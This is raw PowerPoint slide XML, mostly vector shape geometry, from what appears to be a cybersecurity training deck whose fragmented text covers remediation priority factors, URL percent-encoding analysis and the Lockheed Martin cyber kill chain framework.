                    <a:pt x="783199" y="35099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="760327" y="8899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="734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47559" y="4549140"/>
              <a:ext cx="2202179" cy="195224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223124" y="4623816"/>
              <a:ext cx="2056130" cy="1807845"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2056129" h="1807845">
                  <a:moveTo>
                    <a:pt x="1494535" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="561085" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="537364" y="3752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="493398" y="29307"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11810" y="855599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="903620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2952" y="928911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="478535" y="1759331"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="513905" y="1793446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561085" y="1807464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1494535" y="1807464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1541716" y="1793446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1577085" y="1759331"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2043810" y="950976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2055621" y="903620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2052669" y="878163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1577085" y="48133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1541716" y="14017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1494535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7419593" y="3296487"/>
            <a:ext cx="17849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r>
              <a:rPr dirty="0" sz="2200" spc="-7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integrity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846944" y="4617466"/>
            <a:ext cx="136906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90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Dow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n</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="100">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>time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012806" y="6055258"/>
            <a:ext cx="1643380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4955" marR="5080" indent="-262890">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Economic</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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or </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-56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publicity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781670" y="7497826"/>
            <a:ext cx="80645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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-150">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>c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ope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69789" y="6026408"/>
            <a:ext cx="1282700" cy="796290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="622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90"/>
              </a:spcBef>
            </a:pP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Detection</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="1905">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pP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time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868671" y="4617466"/>
            <a:ext cx="18669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Recovery</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-4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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>time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343780" y="1930145"/>
            <a:ext cx="756221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Factors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affect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process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remediation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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>priority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are: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26" name="object 2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534656" y="4856988"/>
            <a:ext cx="1301496" cy="130149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11928" y="306451"/>
            <a:ext cx="62306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25">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Uniform</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-4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E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Resource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50">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Locator</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-4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E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Analysis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65730" y="1882292"/>
            <a:ext cx="11919585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533265" marR="5080" indent="-4521200">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Percent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encoding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method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allows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user-agent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submit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any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safe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unsafe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character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server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within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URL.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7244" y="760476"/>
            <a:ext cx="8531352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856223" y="7888630"/>
            <a:ext cx="467423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3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Scr</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="-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14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1400" spc="-30">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ns</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="-10">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ho</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="-4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1400" spc="-4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14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3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14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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="-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1400" spc="-3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1400" spc="-25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dirty="0" sz="14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1400" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ntage</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="14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1400" spc="-30">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="-2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1400" spc="-15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1400" spc="-5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1400" spc="-60">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ng</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="14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25">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ca</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="-2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14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dirty="0" sz="14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2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1400" spc="-1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14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1400" spc="-1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14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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ab</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="-5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1400" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="14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1400" spc="-70">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode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501584" y="3307397"/>
            <a:ext cx="7448550" cy="4106545"/>
            <a:chOff x="1501584" y="3307397"/>
            <a:chExt cx="7448550" cy="410654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0096" y="3336035"/>
              <a:ext cx="7391400" cy="404926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515872" y="3321684"/>
              <a:ext cx="7419975" cy="4077970"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="7419975" h="4077970">
                  <a:moveTo>
                    <a:pt x="0" y="4077842"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7419975" y="4077842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7419975" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4077842"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="04668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01911" y="3214116"/>
            <a:ext cx="5885688" cy="4215384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27167" y="306451"/>
            <a:ext cx="620141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80">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cyber</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-135">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="45">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kill</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-145">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Chain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125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-135">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="130">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Framework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68040" y="760476"/>
            <a:ext cx="9503664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04770" y="1653692"/>
            <a:ext cx="12039600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71625" marR="5080" indent="-1559560">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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key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tool</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>threat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research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describes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various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stages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attack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called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cyber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kill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chain.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Lockheed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Martin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kill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chain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identifies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following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phases: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493308" y="2802305"/>
            <a:ext cx="1704339" cy="1721485"/>
            <a:chOff x="5493308" y="2802305"/>
            <a:chExt cx="1704339" cy="1721485"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5493308" y="2802305"/>
              <a:ext cx="1704339" cy="1721485"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1704340" h="1721485">
                  <a:moveTo>
                    <a:pt x="838475" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="791541" y="2448"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="745124" y="7432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="699308" y="14897"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="654179" y="24784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="609824" y="37037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566327" y="51599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523773" y="68413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="482250" y="87422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441841" y="108569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="402632" y="131797"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="364710" y="157049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="328159" y="184268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="293065" y="213398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="259514" y="244380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227591" y="277159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197381" y="311677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168970" y="347877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142444" y="385703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117888" y="425097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95388" y="466003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75029" y="508363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56896" y="552121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41076" y="597220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27653" y="643602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16713" y="691210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8445" y="739355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2941" y="787325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145" y="835035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="882400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2448" y="929334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7432" y="975752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14897" y="1021568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24784" y="1066696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37037" y="1111052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51599" y="1154549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68413" y="1197102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87422" y="1238626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108569" y="1279035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131797" y="1318243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157049" y="1356165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184268" y="1392716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213398" y="1427810"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244380" y="1461361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277159" y="1493285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311677" y="1523494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="347877" y="1551905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385703" y="1578431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425097" y="1602987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466003" y="1625488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="508363" y="1645847"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="552121" y="1663979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="597220" y="1679800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="643602" y="1693223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="691210" y="1704162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="739367" y="1712431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="787348" y="1717934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="835067" y="1720730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="882439" y="1720876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="929379" y="1718428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="975801" y="1713443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1021621" y="1705979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1066751" y="1696091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1111108" y="1683838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1154605" y="1669276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1197158" y="1652462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1238680" y="1633453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1279087" y="1612306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1318292" y="1589078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1356211" y="1563826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1392759" y="1536607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1427848" y="1507478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1461395" y="1476495"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1493314" y="1443717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1523520" y="1409199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1551926" y="1372998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1578448" y="1335172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1603000" y="1295778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1625497" y="1254872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1645853" y="1212512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1663983" y="1168754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1679802" y="1123656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1693223" y="1077274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1704162" y="1029665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="860501" y="860374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1029665" y="16713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="981521" y="8445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="933551" y="2941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="885840" y="145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="838475" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="CF5C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653595" y="2962810"/>
              <a:ext cx="1400175" cy="1400175"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1400175" h="1400175">
                  <a:moveTo>
                    <a:pt x="696664" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="650416" y="1715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="604764" y="6454"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="559829" y="14135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="515736" y="24677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="472606" y="37997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430563" y="54015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="389730" y="72647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="350228" y="93814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="312181" y="117432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275712" y="143420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="240943" y="171696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207997" y="202179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176997" y="234786"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148066" y="269437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121326" y="306048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96900" y="344540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74911" y="384829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55482" y="426834"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38735" y="470474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24793" y="515666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13779" y="562328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5946" y="609627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1380" y="656698"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="703419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1723" y="749667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6468" y="795320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14154" y="840254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24699" y="884347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38022" y="927477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54040" y="969520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72674" y="1010354"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93840" y="1049855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117458" y="1087902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143446" y="1124371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171723" y="1159140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202206" y="1192086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234815" y="1223086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="269468" y="1252017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="306083" y="1278757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="344579" y="1303183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="384875" y="1325172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="426888" y="1344602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="470537" y="1361349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="515741" y="1375290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562419" y="1386304"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="609717" y="1394152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="656788" y="1398730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="703509" y="1400120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="749757" y="1398405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="795410" y="1393666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="840344" y="1385985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="884438" y="1375443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927567" y="1362123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="969610" y="1346105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1010444" y="1327473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1049946" y="1306306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1087992" y="1282688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1124462" y="1256700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1159230" y="1228424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1192176" y="1197941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1223176" y="1165334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1252108" y="1130683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1278848" y="1094072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1303273" y="1055580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1325262" y="1015291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1344692" y="973286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1361439" y="929646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1375381" y="884454"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1386395" y="837791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1394227" y="790479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1398793" y="743395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1400174" y="696665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1398451" y="650409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1393706" y="604751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1386020" y="559812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1375475" y="515717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1362152" y="472586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1346133" y="430544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1327500" y="389712"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1306333" y="350213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1282715" y="312170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1256727" y="275705"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1228451" y="240941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1197967" y="208000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1165358" y="177006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1130706" y="148080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1094090" y="121345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1055594" y="96924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1015299" y="74939"/>
                  </a:lnTo>
                  <a:lnTo>
